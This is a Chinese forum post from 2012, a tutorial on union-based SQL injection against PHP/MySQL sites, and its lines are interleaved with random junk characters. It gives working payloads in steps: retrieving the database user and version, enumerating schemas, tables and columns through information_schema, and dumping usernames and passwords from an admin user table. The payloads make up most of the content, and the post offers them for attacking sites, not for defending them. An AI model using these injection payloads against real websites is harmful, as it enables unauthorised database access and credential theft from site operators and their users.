, U8 t0 B+ N4 e) ~: F教程内容:Mysql 5+php 注入8 H- e& {, ]8 R, i! o# B
, K" ]( g6 A9 K2 L
8 ^4 `- W0 B, B" c
3 \: ?, R5 m/ f9 H7 A2 F一.查看MYSQL基本信息(库名,版本,用户)
# ]7 Q8 J- ]6 U, r. {+ f$ e& j" i6 r, Y4 v0 v8 m3 o a% ?
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
4 J6 K# ]+ y" K" ^0 H- r) A( c5 A5 ^; `3 [& [1 U' d* J
二.查数据库: i6 L n* q1 N" @# k
; A' I1 @& C- U6 ] Q9 C
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*5 v h5 ^# A$ V
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。* B9 {$ F: |: m
* S: Z- y C5 T3 \3 e, ^' y
三.暴表
8 v$ u1 I/ T( T. n% Q K
; w) k" a# H) e! N3 e: k- Band 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
7 U& k* [4 n: S% m- a/ z, V' I' v6 F5 X
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
{, c$ B0 d( D3 L) g$ C
- s) O, D* f% Z/ ^) m% m( r四.暴字段7 k3 z) \5 L3 R( F+ l% x
+ @2 c0 D7 d4 ]; p z/ k$ ?: aand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
6 O, x" k o1 Z% R! M
$ V# Z1 s) @4 L' plimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
; ~4 u4 \! p a
( x9 q; j0 S4 U a1 T/ S) Q& q五.暴数据! o% D2 B9 {7 ~5 i
, Y) E7 M" v' ~8 U0 k
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
8 j8 V( I# i! `2 B" i6 E4 c0 ?0 \
/ _: g6 U# o5 \% y& U9 C. z0 ~/ T* n# z" j. ^
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
^8 @0 I8 X# A# ~% N- g |
发表于 2012-9-13 16:27:53
收藏
支持
反对